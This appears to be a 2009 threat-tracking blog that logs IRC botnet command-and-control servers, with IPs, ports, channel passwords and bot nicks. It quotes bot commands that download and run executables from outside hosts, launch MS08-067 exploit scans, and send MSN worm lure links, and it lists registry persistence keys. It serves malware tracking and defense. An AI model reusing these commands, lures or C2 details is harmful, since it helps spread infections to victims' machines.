212.116.225.118 6667, 4244
Channel: #!N!#
.download http://photophoto.com.ar/photo.exe C:/aha.exe 1
.msn.msg Estat Photo so Tuos ? http://photophoto.com.ar/msn.exe?=
Autostartpath
LM\Software\Microsoft\Windows\CurrentVersion\Run\
Windows UDP Control Center = winudpmgr.exe
C:\WINDOWS\winudpmgr.exe
Saturday, September 12, 2009
nhg1.cjb.net ( msn )
Posted by Role at 5:39 AM 0 comments
64.127.41.211 ( Johnny_Demonik ) ( H4CK3D.US )
64.127.41.211 6667
USERHOST [00|USA|XP|SP3]-4698
MODE [00|USA|XP|SP3]-4698 -x+iB
JOIN #D3v|lz password: D3v|lz666
.download http://shells.h4ck3d.us/Viri/Johnny_Demonik.exe C:\Johnny_Demonik.exe 1
Autostartpath
%System%\regeditv8.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft = "RegEditv8.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
Microsoft = "RegEditv8.exe"
[HKEY_CURRENT_USER\Software\ASProtect]
Microsoft = "RegEditv8.exe"
Posted by Role at 4:34 AM 0 comments
Friday, September 11, 2009
new.burimche.net ( burimi ) ( NESbot )
*** IP of : 85.248.5.222 host new.burimche.net
85.248.5.222 1212
NICK [solo][USA|XP|16993]
USER NESv5 * 0 :[solo][USA|XP|16993]
Channel:
#buli#
#infochan Topic is '.msn.stop|.msn.msg foto http://www.hi5-ph0tos.com/viewimage.php?='
password:
letmein
Autostartpath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
winsvc32 = winsvc32.exe
Posted by Role at 10:39 PM 0 comments
218.29.54.25 ( ms08-067 )
218.29.54.25 7384
Nick [00_USA_XP_3338273]
Channel: #sbu
Topic :.asc -S|.http http://89.149.227.51/strang.exe|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r
Autostartpath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
Microsoft Driver Setup = C:\WINDOWS\msvddr32.exe
Posted by Role at 10:02 PM 0 comments
b1n.th3kings.net
*** IP of : 203.154.27.138 host b1n.th3kings.net
203.154.27.138 27034
JOIN #!!ss!!# password: bbbbbbb
MODE [00|USA|412536] +ix
Autostartpath
LM\Software\Microsoft\Windows\CurrentVersion\Run
javaupdate = "C:\Windows\svchost.exe.exe"
Posted by Role at 9:39 PM 0 comments
Thursday, September 10, 2009
botnet.byinter.net ( msn and usb )
174.132.181.27 6667
Channel #botnet
Channel: #KCA with Password KCA
Channel Topic for Channel #KCA: ".msn"
Server stats
There are 89 users and 774 invisible on 4 servers
5 operator(s) online
21 unknown connection(s)
23 channels formed
I have 851 clients and 2 servers
-
Current Local Users: 851 Max: 1003
Current Global Users: 863 Max: 1814
Posted by Role at 8:55 AM 0 comments
Wednesday, September 9, 2009
82.114.87.46 ( msn )
82.114.87.46 1868
MODE [00|USA|920254] -ix
JOIN #!a!
Topic is '.msn.stop|.msn.msg ola! Cette photo est la vôtre? http://galery.ga.ohost.de/photoss.php?='
Autostart path
CU\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite
"C:\Windows\installed.exe"
LM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Meteorite
"C:\Windows\installed.exe"
LM\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite
"C:\Windows\installed.exe"
LM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Shell "Explorer.exe"/"Explorer.exe, C:\Windows\installed.exe"
LM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userini
"C:\WINDOWS\system32\userinit.exe,"/"C:\WINDOWS\system32\userinit.exe, C:\Windows\installed.exe"
Posted by Role at 11:56 PM 0 comments
Tuesday, September 8, 2009
lovings.technigoyous.net ( MS08-067 )
lovings.technigoyous.net DNS_TYPE_A 125.83.89.212
125.83.89.212:1863
Nick: [N00_AUT_XP_4752491]H\xe8@
Username: SP3-086
Joined Channel: #bb with Password ^B^B^B^B
Channel Topic for Channel #bb: ".asc -S -s |.http http://218.10.17.212/hihi.exe |.asc exp_all 15 5 0 -a -r -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 10 5 0 -c -e |.asc exp_all 3 5 0 -b -r |.asc exp_all 3 5 0 -c"
Posted by Role at 1:42 AM 0 comments
218.10.17.212:8585 ( MS08-067 )
There are 5520 users and 143 invisible on 1 servers
1 operator(s) online
88 unknown connection(s)
6 channels formed
I have 5663 clients and 0 servers
-
Current Local Users: 5663 Max: 9882
Current Global Users: 5663 Max: 9882
#tony 41 [+mu] .r.getfile http://rapidshare.com/files/276894379/hihi.exe C:\difdhg.exe 1
#petro 7 [+mnMCu] .r.getfile http://rapidshare.com/files/276894379/hihi.exe C:\sidh.exe 1
#tanker 5468 [+mMu] .asc -S|.http http://218.10.17.212/cakar.exe|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r
#new 71 [+mu]
#sucker 18 [+mu]
Posted by Role at 1:41 AM 0 comments
Thursday, September 3, 2009
174-143-210-150.static.cloud-ips.com ( ms08-067 ) ( J )
174.143.210.150:80
JOIN #xx10
MODE [00_USA_XP_7029018] -ix
IDENT SP3-191
USERNAME Peter
Topic is '.asc -S -s |.http http://94.76.194.116/xx10.exe |.asc exp_all 15 5 0 -a -r -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 10 5 0 -c -e |.asc exp_all 3 5 0 -b -r |.asc exp_all 3 5 0 -c |.down -S |.down http://94.76.194.116/brown.jpg c:\b2k8o4l4q3z1.exe c:\b2k8o4l4q3z1.exe -r -h'
Autostart path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Microsoft Driver Setup = C:\WINDOWS\system32\drivers\explorer.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Microsoft Driver Setup =C:\WINDOWS\system32\drivers\explorer.exe
Posted by Role at 2:38 AM 0 comments